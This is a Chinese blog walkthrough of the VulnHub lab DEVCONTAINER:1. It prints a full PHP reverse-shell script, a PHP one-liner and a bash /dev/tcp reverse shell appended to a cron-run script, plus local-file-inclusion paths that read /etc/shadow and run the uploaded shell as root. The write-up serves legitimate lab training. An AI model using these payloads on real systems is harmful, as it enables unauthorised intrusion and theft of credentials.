vulnhub-DEVCONTAINER: 1

最新推荐文章于 2024-07-06 10:17:02 发布
最新推荐文章于 2024-07-06 10:17:02 发布
阅读量221 收藏
点赞数
文章标签: shell 网络安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43400414/article/details/118441354
版权

一、环境搭建

下载地址:

https://www.vulnhub.com/entry/devcontainer-1,548/

靶场描述:

Goal: 2 flagas
Difficulty: Easy-intermediate
Information: Your feedback is appreciate:
Twitter: @0x04E1
This works better with VirtualBox rather than Vmware

配置IP地址

参考:https://www.cnblogs.com/asstart/p/12626494.html

二、渗透测试

获取靶机IP:利用kali的netdiscover探测靶机IP地址

命令:netdiscover -i eth0(网卡) -r 192.168.226.0/24(网段)

扫描目录:利用kali工具dirb

命令:dirb http://192.168.226.150

文件上传:访问192.168.226.150/upload,上传一个php的反弹shell的脚本reactionshell.php,代码如下

<?php 

set_time_limit(0); 

$ip= "192.168.226.130"; # set your kali ip

$port= 4444; # set you kali port

$fp=@fsockopen($ip,$port,$errno,$errstr);

if(!$fp){echo "error";}

else{

    fputs($fp,"\n+++++++++++++connect sucess+++++++++\n");

    while(!feof($fp)){

    fputs($fp,"shell:");

    $shell=fgets($fp);

    $message=`$shell`;

    fputs($fp,$message);

    }

fclose($fp);

}

?>

反弹shell(1):使用kali监听4444端口

nc -lvp 4444

此时执行whoami可以发现当前权限为www-data,且不能进入其他目录,在当前页面中使用php一句话反弹shell

php -r '$sock=fsockopen("192.168.226.130",6666);exec("/bin/sh -i <&3 >&3 2>&3");'

反弹shell(2):建立新的监听 nc -lvp 6666,此时权限依然为www-data,但是可以切换目录

但是还是不能进入/Maintenance-Web-Docker目录

使用如下命令提升权限

/usr/bin/script -qc /bin/bash /dev/null

stty raw -echo; fg; reset

参考链接(https://schtech.co.uk/linux-reverse-shell-without-python/

此时可以进入/Maintenance-Web-Docker目录

执行cat list.sh命令我们可以发现我们可以通过执行

echo "bash -i >& /dev/tcp/192.168.226.130/7777 0>&1" >> list.sh

来新生成一个名为richard的shell

反弹shell(3):

获取到了第一个flag

本地文件包含:

执行sudo -l 得到提示

执行框中命令,即可访问之前不能访问的8080端口,通过观察可以发现此端口的页面中存在文件包含

http://192.168.226.150:8080/index.php?view=../../../../../etc/passwd 

http://192.168.226.150:8080/index.php?view=../../../../../etc/shadow

http://192.168.226.150:8080/index.php?view=../../../../../root/proof.txt

得到flag

提权至root:

(1)将reactionshell.php 复制到tmp目录中

cp /home/richard/web/upload/files/reactionshell.php /tmp/reactionshell.php

再使用8080端口进行文件包含

http://192.168.226.150:8080//index.php?view=../../../../../../tmp/reaction.php

(2)或者:

直接进行文件包含

http://192.168.226.150:8080/index.php?view=../../../../../../home/richard/web/upload/files/reactionshell.php

再次监听4444端口,可以看见当前权限为root

ku3n
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
vulnhub-DEVCONTAINER: 1-DEVCONTAINER
yutianovo的博客
09-16 536
靶机描述 Goal: 2 flagas Difficulty: Easy-intermediate Information: Your feedback is appreciate: Twitter: @0x04E1 This works better with VirtualBox rather than VMware 下载 https://www.vulnhub.com/entry/devcontainer-1,548/ 清单 信息搜集 netdiscover nmap dir 利用 文
VulnHub渗透测试实战靶场 - DevContainer:1
LYJ20010728的博客
08-24 445
VulnHub渗透测试实战靶场 - DevContainer:1题目描述环境下载DevContainer:1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权Flag-1Flag-2 题目描述 Goal: 2 flagas Difficulty: Easy-intermediate Information: Your feedback is appreciate: Twitter: @0x04E1 This works better with VirtualBox rather than VMware
DevContainer 1 靶机 wp
m0_52496313的博客
10-05 633
DevContainer 1 靶机 wp
八种Docker容器开发模式---The Shared Volume Dev Container
weixin_34404393的博客
05-05 146
为什么80%的码农都做不了架构师?>>> ...
VulnHub-DerpNStink:1渗透学习
我是小小白的博客
07-13 889
前言 靶机地址:https://download.vulnhub.com/derpnstink/VulnHub2018_DeRPnStiNK.ova 靶机难度:中级(CTF) 靶机发布日期:2018 年 2 月 9日 靶机描述:Derp 先生和 Stinky 叔叔是两位正在创办自己的公司 DerpNStink 的系统管理员。他们没有聘请合格的专业人士来建立他们的 IT 环境,而是决定将他们自己的系统组装在一起,该系统几乎准备好上线...... 目标:得到root权限&找到4个flag文件
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
VulnHub-Walkthroughs:Alienum的md格式的VulnHub演练
03-07
1. **环境准备**:首先,你需要下载并导入 Alienum 的 VM 镜像到虚拟机软件(如 VMware 或 VirtualBox)中,确保网络设置为“NAT”模式,以便能与外部网络通信。 2. **信息收集**:演练的第一步是进行信息收集,这...
vuInhub靶场实战系列-prime:2
06-08
vuInhub靶场实战系列-prime:2
devcontainer:dotfiles + devcontainer的实验设置
04-06
开发容器 dotfiles + devcontainer(WIP)的实验设置 这是什么 我为dotfiles + devcontainer设计的个人实验设置,可以与Github CodeSpace和VSCode Devcontainer扩展一起使用。 如何 Docker映像和软件包以及个人实用程序,点文件使用git进行版本控制,并使用Bazel进行管理和构建,以确保可重复性。 容器映像将使用container_test bazel规则进行测试,以确保内容正确。 安装了busybox的基本映像应该是稳定的。 参考 此仓库受到极大启发
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
Vulnhub-CTF-Writeups 该备忘单针对CTF玩家和初学者,可帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章。 我们已经根据我们的经验执行并编制了此列表。 请与您的联系分享此信息,并...
shell】将txt文件拆成n个,文本均匀按行分布
xuanzui的博客
07-03 173
【代码】【shell】将txt文件拆成n个,文本均匀按行分布。
通过shell脚本创建MySQl数据库
fen_fen的专栏
07-01 177
通过shell脚本创建MySQl数据库
shell编程小项目】
最新发布
qq_62331653的博客
07-06 341
1、编写 Shell 脚本,要求代码逻辑符合需求,前后代码风格统一,执行时显示信息简明扼要,符合代码意图。7、要求实现 DNS 服务,监听地址为 172.16.10.11,要求提供该环境中所有的主机名解析。2、该脚本应当实现 node.exam.com 节点上的需求,同时包含对应服务的测试结果。4、要求访问 www.exam.com 时,页面内容为 Welcome to exam。3、实现 Web 服务器 www.exam.com 和 www.test.com。
APP项目测试 之 APP性能测试-- 性能测试工具(SoloPi工具)
qq_48917474的博客
07-06 665
App性能测试工具SoloPi工具的安装与基本使用
渗透测试里的边界突破
qq_69775412的博客
07-04 232
【代码】渗透测试里的边界突破。
如何延时运行shell里面的程序
狂小虎/Anthony Dave的博客 KuangXiaoHu's Blogs
07-02 15
有些程序会占用GPU运行到半夜一两点,不想熬夜干活,但是又想最大限度利用硬件。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值